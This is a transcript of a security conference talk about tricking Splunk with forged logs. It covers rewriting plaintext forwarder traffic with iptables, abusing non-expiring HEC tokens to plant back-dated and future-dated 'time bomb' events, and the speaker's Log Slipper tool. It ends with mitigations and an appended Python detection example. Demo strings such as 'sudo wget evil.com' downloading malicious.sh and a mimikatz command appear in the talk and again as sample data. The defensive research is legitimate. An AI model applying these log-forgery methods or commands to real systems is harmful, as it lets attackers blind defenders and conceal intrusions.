SIEM Slam: Tricking Modern SIEMs With Fake Logs And Confusing Blue Teams - Özgün Kültekin

BSides Prague · 39:20 · 760 views · Published 2024-04 · Style: Talk

Transcript [en]

So I am quite excited to be here, and welcome you all to my talk, and thanks to the BSides Prague organizers for the kind invitation. It seems like a European DEF CON, but without any bomb alarm, so we are safe. I'm so glad to be here. My talk is about SIEM Slam: basically tricking modern SIEM systems by creating and injecting fake logs and confusing the blue teams, which is my favorite part. So who am I and what do I do? I'm Özgün, I'm 23 years old and currently living in Turkey. I'm an offensive security engineer at Trendyol Group, which is a quite high-tech focused e-commerce company, so I had a chance to

investigate lots of different applications: different mobile applications, Active Directory, web and desktop applications. I got a bunch of certifications and others. My main focus is penetration testing, but I also do breach attack simulation, like creating and designing red team campaigns and applying them. My previous talks in 2023 were at BSides San Antonio, Tirana and others, so we got pretty dense content, but let's just skip it. Okay, so let's start with some basic rules. I mean, we are all probably working somewhere and we have all dealt with some SIEM tools, I guess. So do we trust logs? Do we trust SIEM? Do we trust our

blue teams? We trust them, yeah. Can I see some hands? Yeah, okay. I mean, we of course trust, right? No, it's not... So okay, the first rule is: never trust your logs and never trust your SIEM systems, which we will soon find out. And the second rule is: we are dealing with SIEMs, as we talked about earlier, but how many of us are specifically using Splunk in their company or personally? Okay, I see a bunch of hands. Okay, so you are saying that you are using Splunk. Well, okay, from now on it's better not to talk about that kind of thing: if anyone asks you what SIEM product

you are using, just don't answer. Okay, let's start with some introduction for whoever doesn't know about SIEMs. So a SIEM is basically Security Information and Event Management, right? It is centralized log management where we can keep all of our logs from desktops, from web applications, from, I don't know, Kubernetes containers, and it actually stores whatever logs you give it. I mean, you can actually use Splunk as your notebook: whatever you give will be presented on the Splunk UI or SIEM UI. And blue teams are using this Splunk or SIEM tool to generate alerts based on some rules. For example, they are saying something like: okay, if

in the last three minutes we get over 10 Windows login failed events, then we are maybe under some password spraying attack. And also they have to use it because of some compliance and regulatory requirements, because, you know, they need that. And also we can use it for historical analysis and forensics of the past. Okay, so I chatted with my best friend. I asked: hey, I need to hack the most popular SIEM solution in the world, what is that? And the immediate answer was Splunk. As I asked GPT-4 (I have little money), it says that based on 2024 data Splunk is the most recognized SIEM. Then from that moment I

just turned all my focus to

Splunk. Okay, so an example structure of this Splunk deployment: we are seeing a bunch of forwarders, data sources, intermediate forwarders, indexers and search heads. So let's start with forwarders. They're basically Splunk agents that we build on any machine that we want to get logs, get data from. So it's not an external component; we just go into our Windows or Linux machine, install the universal forwarder executable and just build it, and it actually collects the logs from some of the local files that you set, for example audit.log, and forwards the logs from the universal forwarder to intermediate forwarders or, as you can see from above, directly to the indexer. The second one is the heavy forwarder.

The heavy forwarder: probably all of our companies have heavy forwarders, because we need some additional data manipulation before the data comes to the indexer. Heavy forwarders perform some parsing and indexing at the source, on the host machine, and send only the parsed events to the indexer, so you can think of it like intermediate extra data manipulation. The deployment server is actually just sending some configurations, some extra settings, some other content updates to both universal forwarders and heavy forwarders, sometimes indexers, but that's not so common. An indexer basically transforms all the incoming data into events and stores it on some

disk, and the search head is actually where we run our searches. I mean, there's also the Splunk UI; we are writing our queries into the Splunk UI, but it actually runs those queries on the search heads, and search heads just give jobs to the indexers. So let's start over: forwarders consume the data, indexers index and search the data, and search heads just coordinate all this communication. The management console is just a set of dashboards, platform assets, something like that, and the search head is just the front-end part of Splunk that we all use and see on the screen. Okay, so chapter one: what a hacker needs. Okay, so let's consider a

hypothetical scenario: consider an attacker who has managed to get into a company and has initial access on some, let's say, Linux machine, and did some privilege escalation and got root privileges, or in the case of Windows, SYSTEM privileges. What can the hacker do after that step? He or she can exfiltrate data, steal some sensitive data and send it over to the attacker's C2 server, or just disrupt some business operations or launch a ransomware attack. But for that, some discovery is also needed, right, because you need to discover more, you know, sexy targets in the network to hack. But when doing all of this, the problem is the attacker makes noise, and we

are leaving so many traces, and this is the problem I need to get a solution for. Okay, so love is all you need? No, we need time: time to exfiltrate some data. I think it needs more time to recon more, discover more, execute the kill chain and exfiltrate data over his or her C2 server. But we are making so much noise there; we have left traces all over the SIEM logs, probably, and the blue team is already investigating us, right, because we got initial access, we got our root access, privilege escalation, and we are constantly doing something. So the blue team is probably already investigating us. So at that point, what can the attacker do? Okay, so the main topic of this talk

is: we can create and inject fake logs, and by creating these fake logs we can mimic another attack. What I mean by mimicking another attack is actually: let's say you compromise the host on the left (can I do it? not sure, all right), you compromise that one, and let's say you want to distract the blue teams. So what you will do is, after discovering that some payment server is over there, you can just show: hey, blue team, your payment server got hacked, do you want to do something, or do you still want to chase me? They will probably go after the payment server, right? So you are

having some more time over there. And besides that, you can spam some logs and make some noise, and it could have some, you know, downsides in terms of wasted dollars if your Splunk instance charges you by the event count. So how it all started: I was doing some security device inspection. I woke up, washed my face, got some coffee, and, like all of you do, we investigated EDRs, SIEMs and such, right? So at that point, what we red teamers actually do is, after we got some root privileges on the Linux host or Windows host (it is pretty much harder on Windows because of PPL), but

on Linux you can just kill the EDRs, right? Kill Falcon, kill other antiviruses, or kill SIEM logs. Why do we want to send logs again? So we just kill it. But at that point I thought: why kill it? We can break it. So let's check how common components of Splunk or SIEM tools communicate, and I saw something: I noticed that the traffic between the forwarders and the indexer is plain text. I mean, what the heck? Why can I see my host IP, my host name, the command that I just executed on the host? I can see those as plain text. So what can I do with that?

So it actually determined my research focus. The research focus was analyzing modern SIEMs, especially Splunk (only Splunk for now) with default configurations: what can we do? Let's investigate forwarder and indexer communications, do some man-in-the-middle type of attacks and inject logs. And for red teamers, we can actually use that log injection as part of the red team, you know, post-exploitation: after you get root access, you can do that. Okay, explore and exploit. So sending logs is quite easy, as I said before. It has positive aspects for blue teams, negative aspects for whoever knows that attack. So let's explore the SIEM traffic. So I

intercepted the forwarder TCP traffic by creating some kind of iptables rule, like: let me examine all of the packets before they go outside. And I parsed it, I made it readable, and I started to detect useful headers, and I found some executed commands over there, host name, IP addresses, some machine IDs, because it also sends the machine ID, which can be found under /etc/machine-id; it's a unique value. And after all of that, after modifying it, I fixed the TCP packet structure, by which I mean fixing the checksum and length in the TCP headers. I modified the TCP packet and sent it, and what happened is we actually made a search result that looks like

I executed some other component, some other command. So the first one is outgoing SIEM logs from the forwarder. There's some queue that I created with iptables. It looks like it's between the forwarder and the indexer, but actually it's just inside the forwarder, because I'm just setting an iptables rule; I just made it look easy. But the attacker intercepts the packet from the queue, like: before going outside, get the packet, read the data, okay, check for the desired data; if the desired data is there, just find and replace it with the malicious command, let's say, and make the packet go again. And after the modified log goes to the indexer, you can see the lovely face of the confused blue

team over there, because they are going to see: oh, this machine got hacked. Okay, injection, how injection works. We are not creating a log, we are just modifying it, right? So what I showed you is I'm just modifying logs on the fly; I'm actually not creating logs. So how can we create our desired logs? I mean, I couldn't find all the logs; I can't create a log from scratch. So what we do is do the same interception with the same iptables and execute commands in parallel, like the image states, which I created using DALL-E, I guess, and which is pretty sexy actually, because it's actually executing commands with its left hand

and injecting with its right hand. So execute commands in parallel, capture your own action's log, modify it as you wish and send it to the indexer. This way we can actually create a new log. Okay, but there's a problem, right? I mean, what I did say is: execute a shell command, your own command, on your own host machine and then capture it and change the host IP. Okay, I can do it, but do you want me to execute some malicious commands on my compromised machine? That doesn't make any sense. So what we did is generate hashes of the desired commands. Let's say you wanted to run some ransomware: just hash the

ransomware command, generate the hash, keep them in a map, and when you listen and intercept the traffic, when you see that hash, just replace it with the original one. What I mean is: let's say you want to execute a `wget evil.com` malware attack, right? So instead of wget you will execute a92c..., which is, I probably used SHA-256 and took the first part. And after that, the blue image shows the packet found with the target data inside, and the target data was a92c. When I saw a92c in the packet I just immediately replaced it with the wget, and for the second command I just find that string hash in the packets

and replace it with the original one. So I created a CLI tool with Go, whose name is Log Slipper, and in this part I am demonstrating it for the TCP scenario. Okay, Log Slipper actually looks like that. It's made with Go; it's an interactive CLI tool, but it can also work with basic commands and parameters, because we need to be fast. But it's just a demonstration tool. It actually automates the whole process, from executing the commands in parallel, intercepting the traffic, finding, replacing and sending again, and it lets you act as the target with the target shell playground, which we are about to see. In this example

scenario, let's say I compromised a machine in the target environment whose host name is Özgün's machine and the original host IP was 10.141.64, and the other machine that I want to target, the one that I want to show the blue teams, hey, prague-demo got hacked: so the target name is prague-demo and the IP address is 10.70.80.95. So it's demo

time. Okay, once we get the help menu you can see a bunch of commands over there, like interactive mode, but besides that there's a built-in attack mode, which we'll explain later. And I'm going to start this tool in interactive mode. What am I showing here is, currently on the Splunk UI you are just seeing the logs from Özgün's machine, because, let's say, there's no other machine on the network for demo purposes; you are just receiving data from Özgün's machine because it's the only data that

exists, as you can see from the host menu: there's just one. Okay, so what we're doing here is, it works with some host file and starts with detecting the target Splunk instance. You don't have to give any indexer IP address; it can automatically find that by intercepting your traffic again and finding who I am sending logs to, and it finds the target indexer's IP address and saves it into a host file. So it is detecting the target Splunk IP by listening to the traffic for 10 seconds. After that it found that we are actually sending logs to 10.141.63. So we are entering the target IP we want to mimic, we want to show that it's

hacked: 10.70.80.95, and prague-demo is the host name, which will be explained later. Okay, so there are four different menus; we are going to select the target shell mode, and it actually spawns a target shell playground. Okay, so firstly what it did is set up the iptables rule to intercept all upcoming

packets. After waiting some seconds, we are generating a new machine ID, because we cannot send with the same machine ID, right? So I generate a new machine ID and I'm sending with this. So each log sent from this computer will be manipulated with the target data from now on, and you can also start executing commands right now. Okay, so what you see here is a target shell playground: you can enter commands to make them look like they are executed on the target system. So our target is prague-demo, with the IP address and with the machine ID. So let's say we are executing some malicious

commands. And before executing any commands, now we can see that there are logs coming up from prague-demo, which doesn't even exist in my actual Splunk environment. I can make up new host names, new IPs, but we started to see some prague-demo host coming up.

It's already over 50 logs. So let's say I want to execute `wget evil.com` to download some malicious.sh, right? So immediately my fake hash log is going out from my machine; I captured it, changed the wget, changed the a92c, changed the other hash with the correct values. At the same time I am also changing the original host name with prague-demo, the original host IP with the fake IP, and I also want to do some nasty things, so I started malware.sh with encrypt-all. I mean, can you imagine how the blue team would react when they see this log in their SIEM environment, which they trust? Okay, so I am doing some

filtering on Splunk: I'm searching for the exact wget, the exact values, and what we see here is there are actually logs coming up from prague-demo, and it executes `sudo wget evil.com`, which doesn't even exist, and you can see that we also changed the host name, host IP and the machine ID with the desired ones. And after that we can even see that they encrypt all the stuff. Pretty fun, right? I mean, at this point I just don't want to be a blue teamer anymore, which I'm not. So this is actually what happened in our demo, but we have more stuff. Okay, so I said that universal forwarders are actually not creating logs; they are actually reading from some

log files, right? We can also manipulate that. So what I mean by that is: the universal forwarder is just a basic program, so why don't we mess with the logs? So in inputs.conf, which is Splunk's basic file where we are saying: okay, read logs from this file; when a new entry is added to this file, just get it and send it to the indexer. So we can add a whole new file there, or we can just manipulate the other files. And I actually put a new line, like a sudo-related event, into the audit.log, and it also reflected on the page, which is a pretty more basic attack, but you cannot change anything, as

you can see: we have our host IP as the original one and Özgün's machine. We also need to capture it on the fly, because we cannot just define the host machine or host IP on the command line. Okay, chapter HEC. What is HEC, or should I say what the heck, because you are not going to like what you see. Okay, in case you need some logs of your applications, and let's say you have some public instances, public web apps, public mobile applications, and you want to get logs from there, Splunk made a genius component called HEC. So you don't need any universal forwarders anymore to execute on the target component or target web app, let's say,

and it lets you send data events over HTTP or HTTPS, hopefully, and it's a token-based JSON API. And one of the Splunk guys seems very proud when answering like this: unlike authentication tokens, HEC tokens do not expire. So congratulations. Okay, an example HEC implementation is actually like that: let's say you put your public heavy event forwarder or indexer, which is open to the public, your token here, and the payload you want to send. For example I sent some gate ID, some entering state; let's say that it's a turnstile or just a door. Okay, so when we look at the overall picture, the right part is what

we already discussed. I mean, there are some Linux machines, some VMs, databases; via the universal forwarders they send logs to heavy forwarders and heavy forwarders to indexers, and we can just log everything on the machines. In the HEC scenario we have some public web apps, public mobile apps, some PACS server, which is a personal attendance check system that receives data from, let's say, card readers or turnstile controls. They don't have any universal forwarders; they send logs to the heavy forwarder as HTTP. So after that, the heavy forwarder just transmits the logs to the indexer using TCP/IP. But in that scenario

you can actually send logs from those applications to the indexer without a need for a heavy forwarder, which is quite bad. Okay, HEC-ing: things are getting worse from that moment. What can an attacker do with a HEC token? Okay, so I think it doesn't need any listening on traffic, doesn't need any, actually, maybe command execution on the web app, and we can create more simple yet chaotic attack scenarios and execute the attack from any machine. And what is worse than an attacker? A time-traveling one. And it's a bit of a spoiler for the upcoming slides. Okay, let's discuss the time traveler's attack using HEC. In attacks like this, we are

sending just HTTP events. The attacker actually can create logs from the past and from the future, and the attacker can actually plant a bomb in the future and wait for the explosion. Let's say from now on I am saying that the payment server will run Mimikatz in 2031; that's possible, and when the day comes the blue team gets alerted, and I'm not even in the environment anymore. So even though attackers are not present in the environment, they can create alerts. Okay, so the next demo will be about time traveling, and in that part I just use the command line instead of interactive. So as the time, it's the exact time; let's say I said 2002, a very past time, a very past time,

and I'm saying 11:30 as the hour, and from the domain prague-test, from the account sqladmin, and it's for the Windows event creation. I am giving the HEC token over there, the IP I want to mimic, the process I want to create: I want to create a mimikatz process with the parameter `token::elevate`, in 2002, on the host name SQL Server, let's say. So when I executed that, Log Slipper says that I created a log on behalf of SQLSERVER01 with the IP, with the process, with the parameters, at that time. I mean, there might be a difference in time, like 3 hours, because of the UTC+3 difference. So when we go into Splunk and

search for the date, let's say before 2003, what we see here is we actually created a log from 2002.

Yeah, I mean, it doesn't make any sense, right? I completely agree with you. And what's funny about creating logs from 2002 is actually, I mean, Splunk was founded in 2003, man. Okay, so another attack was the time bomb attack. Let's say blue teamers have the following alert, which detects the new process creation event code 4688 (you probably heard that a lot), new process name contains mimikatz.exe, which I know is not a perfect alarm, because you can actually bypass that by renaming mimikatz to something else, but let's say our lovely blue teams made that alert, and it's checking every two minutes the past 3 minutes. So the current date is April 2, 2024 and

the time is 22:22 (UTC+2). So I created the log as 23:23, which means you should add three for my time zone, so it actually corresponds to 22:23, which is 1 minute later than the current time. The current time is still 22:22 (+2), and we will be generating alerts 1 minute later. So let's wait for 20 seconds

more. Okay, it's now 22:23, and this is my alert screen. There was a previous alert, which is from the same names earlier; just don't mind that. What we are going to see is an alert coming

up. So I refresh the page and see that a whole new alert is coming, and the worst thing about these alerts is, I mean, the blue team gets freaked out, so when they examine the corresponding log they will see that the sqladmin user on the prague-test domain, with the computer name SQLSERVER01, has created mimikatz.exe with a bunch of parameters,

and on the mail, like the classical mail that probably, when we executed this attack, this is the most scary moment for the blue team, they will receive some mail like: SQLSERVER01 mimikatz execution detected, Prague nightmare. So we can also do Windows event spam, like I said. So, as you know, Active Directory is one of the most crucial parts of our environments, right? So companies tend to have much more alerts, much more hardening on those components. For example, they will probably catch you if you try to do some password spraying or pass-the-hash attack, and this demo just does that. This time I will open my Log

Slipper in interactive mode, entering, setting a new config with a HEC token; this is how you can give a HEC token to Log Slipper, by setting a new config. So after the HEC attack mode I will choose the built-in attacks and Windows mode, and let's say login success event spam, and it requires some target domain name, which I gave as bdemo.com, and sqladmin as user, and some target subnet. Why are we giving a target subnet? Because it will create a bunch of login fail or login success events from this subnet. I mean, after the reconnaissance part, if you know the targeted subnet you can just give this target subnet or give IPs

manually. So we are entering the start time of the attack and the finish time of the

attack, and how many login success events I want to send. So it gives you a table that says: hey, I created those logs and sent them to the indexer. There are some host names, there are some IPs and there are some randomized times in the range that you selected. So it creates login success events on those host names and IPs. So when we go into Splunk and type our search query as index winevent and specify some account domain, then okay, you will see that 25 events actually came to our Splunk UI. So there are all login failed, login success events, like: an account was successfully logged on in the

bdemo.com domain, as sqladmin, using svchost, which we will see in plain

text. And this one is for the login fail attempt; let me just skip that fast. So it also creates a bunch of logs as login fail from those host names and those IPs, and when we search for event ID 4625, I guess 24... so it says: oh, this one, account successfully logged on, sorry, and this was the login failed attempt. I said pr.com administrator failed to log on to those computers 20 times between those dates. So when we search for the 4625 event, which is the login failed event, we will see 20 events actually came, and they are showing that an account failed to log on. It's probably a

password spraying attack. I mean, the scary thing is, if a blue teamer doesn't know about this attack, doesn't know that the SIEM or logs should not be trusted and can be manipulated, they will freak out when they see that. So chapter seven: fighting back. You might say, I mean, just encrypt it, right? Why don't we encrypt it? Splunk is a beautiful company; they already implemented some encryption. You can use it; you can import TLS certificates, public key, private key. It's pretty much secure, but they disabled it on Enterprise by default. I mean, what the... right? So if you just set this up you don't have any encryption. Probably none of you

actually have, because there's a reason for that. I mean, Splunk also can say: okay, I'm giving you some certificates, no problem. But the problem is the root certificate is the same in every Splunk installer. I mean, if you decide to use Splunk's default certificates, an attacker can just get the private key from their own instance and use it on your machine. So what are we going to do? We simply enable the encryption on the forwarding, right? Do not use the default certificates, distribute the root certificates and keep our eye on these root certificates, make sure that they are not revoked and they are secure. But we need to also pray that the

CPU doesn't burn out. This is why none of our companies can enable the encryption, because it's actually a very big burden on your heavy forwarders, indexers, universal forwarders if they are trying to encrypt your data when petabytes of data are coming up; you cannot simply encrypt it. So what should we do? As Splunk also states, there's some SSL encryption burden. And let's talk about some detections on indexer and heavy forwarder logs. At the end of the day, we are sending from machine Y to machine X, right? So you can actually check the source IP against the host IP in the log, and you can do it periodically, but it's

also a performance issue. There is a hidden index time field, _indextime, which actually gets the time from the indexer, so you can actually detect the time traveling attack by getting the correct time. But most blue teamers are just using it for debugging purposes. And hardening, some ways to detect: change your HEC tokens periodically; if your heavy forwarder is public, just do your port restrictions; do not use a public indexer; use a heavy forwarder and configure it; and you can implement your own... I mean, you shouldn't roll your own crypto, but you can do some checks. As the roadmap, we will add Log Slipper for Windows, HEC, and other popular SIEM solutions

too, and we want to integrate this as a post-exploitation module into, let's say, Cobalt Strike. So let's confuse blue teams together. I said I published my Log Slipper just yesterday night for you guys, so you can just test it and hack your own Splunk instance, and you can contribute with new built-in attack types and extra customizations, and we can maybe share the lawsuit coming from Cisco, you know. And thank you so much. That's my Twitter, mail, you can reach out, LinkedIn. And I want to thank specifically my SecOps team, Inchel, Onur, Yu, and the offensive security team, Asil and SW from Splunk. Thank you

guys.
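The following is an added example, not part of the talk and not code from the speaker's Log Slipper tool. It sketches in Python the two indexer-side checks the speaker suggests in the "fighting back" part: comparing the host an event claims to come from with the address the event was actually received from, and comparing the event's `_time` with the indexer's own `_indextime` to catch back-dated and forward-dated events. The event dicts, host names and addresses are constructed for the example, and the `conn_src_ip` field (the peer address of the forwarder or HEC client as seen by the indexer) is an assumption: Splunk does not record it under that name by default, so in a real deployment it would have to come from the receiving side's connection metadata.

```python
"""Two indexer-side sanity checks against injected or back-dated events.

Added example, not code from the talk or from Log Slipper.  Events are plain
dicts in the shape Splunk gives them (_time, _indextime, host), plus one field
this example assumes and that Splunk does not record by default: conn_src_ip,
the TCP/HTTP peer address the indexer saw when the event arrived.  Every
sample event, host name and address below is constructed for the example.
"""
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Dict, List, Optional

FUTURE_TOLERANCE_S = 5 * 60       # clock skew tolerated before an event counts as "from the future"
PAST_TOLERANCE_S = 24 * 60 * 60   # forwarders replay backlogs, but not years of them


@dataclass(frozen=True)
class Finding:
    event_id: str
    rule: str
    detail: str


def check_time_skew(ev: dict) -> Optional[Finding]:
    """Compare the event's claimed _time with the indexer's _indextime.

    A time bomb is dated after it was indexed; a time-traveller event is dated
    long before.  Both appear as an outsized difference between the two fields.
    """
    delta = ev["_time"] - ev["_indextime"]
    if delta > FUTURE_TOLERANCE_S:
        return Finding(ev["id"], "future_timestamp",
                       f"_time is {delta:.0f}s after _indextime")
    if -delta > PAST_TOLERANCE_S:
        return Finding(ev["id"], "stale_timestamp",
                       f"_time is {-delta:.0f}s before _indextime")
    return None


def check_host_origin(ev: dict, known_hosts: Dict[str, str]) -> Optional[Finding]:
    """Compare the host field with the address the event was received from.

    known_hosts maps each host name to the forwarder (or HEC client) address it
    is expected to send from.  A spoofed host is either absent from the map or
    arrives from some other machine's address.
    """
    expected = known_hosts.get(ev["host"])
    if expected is None:
        return Finding(ev["id"], "unknown_host",
                       f"host {ev['host']!r} has no registered forwarder")
    if ev["conn_src_ip"] != expected:
        return Finding(ev["id"], "origin_mismatch",
                       f"host {ev['host']!r} expected from {expected}, "
                       f"received from {ev['conn_src_ip']}")
    return None


def run_checks(events: List[dict], known_hosts: Dict[str, str]) -> List[Finding]:
    """Apply both checks to every event and collect the findings."""
    findings: List[Finding] = []
    for ev in events:
        for result in (check_time_skew(ev), check_host_origin(ev, known_hosts)):
            if result is not None:
                findings.append(result)
    return findings


# --- constructed sample data -------------------------------------------------
# Index time for every sample: 2024-04-02 20:22 UTC, i.e. 22:22 in Prague (UTC+2).
NOW = datetime(2024, 4, 2, 20, 22, tzinfo=timezone.utc).timestamp()

# host name -> address its forwarder / HEC client is expected to connect from (constructed)
KNOWN_HOSTS = {
    "ozgun-machine": "10.141.64.10",
    "prague-demo": "10.70.80.95",
    "sqlserver01": "10.70.80.20",
}

SAMPLE_EVENTS = [
    # genuine log from the compromised host itself
    {"id": "e1", "host": "ozgun-machine", "conn_src_ip": "10.141.64.10",
     "_time": NOW - 2, "_indextime": NOW, "raw": "ls -la"},
    # rewritten on the fly: host says prague-demo, but the TCP peer is still the first box
    {"id": "e2", "host": "prague-demo", "conn_src_ip": "10.141.64.10",
     "_time": NOW - 1, "_indextime": NOW, "raw": "sudo wget evil.com/malicious.sh"},
    # HEC time traveller: a 2002 event that arrived in 2024, from the expected client
    {"id": "e3", "host": "sqlserver01", "conn_src_ip": "10.70.80.20",
     "_time": datetime(2002, 1, 1, 11, 30, tzinfo=timezone.utc).timestamp(),
     "_indextime": NOW, "raw": "EventCode=4688 New_Process_Name=mimikatz.exe"},
    # HEC time bomb with a one-minute fuse, posted from an address nobody registered
    {"id": "e4", "host": "sqlserver01", "conn_src_ip": "198.51.100.7",
     "_time": NOW + 60, "_indextime": NOW, "raw": "EventCode=4688 New_Process_Name=mimikatz.exe"},
]

if __name__ == "__main__":
    for f in run_checks(SAMPLE_EVENTS, KNOWN_HOSTS):
        print(f"{f.event_id}: {f.rule} ({f.detail})")
```

Two things the sample data is arranged to show. First, the one-minute time bomb (e4) passes the timestamp check, because any tolerance wide enough for ordinary clock drift between forwarders and indexer is also wide enough for a short fuse; what catches it is the origin check, so the two checks cover different cases and are worth running together. Second, both checks need data the event body alone cannot supply (the indexer's own clock via `_indextime`, and the receiving connection's peer address), which is exactly why an attacker who controls the log text cannot simply edit around them; the cost is the periodic join against the host inventory that the speaker flags as a performance concern.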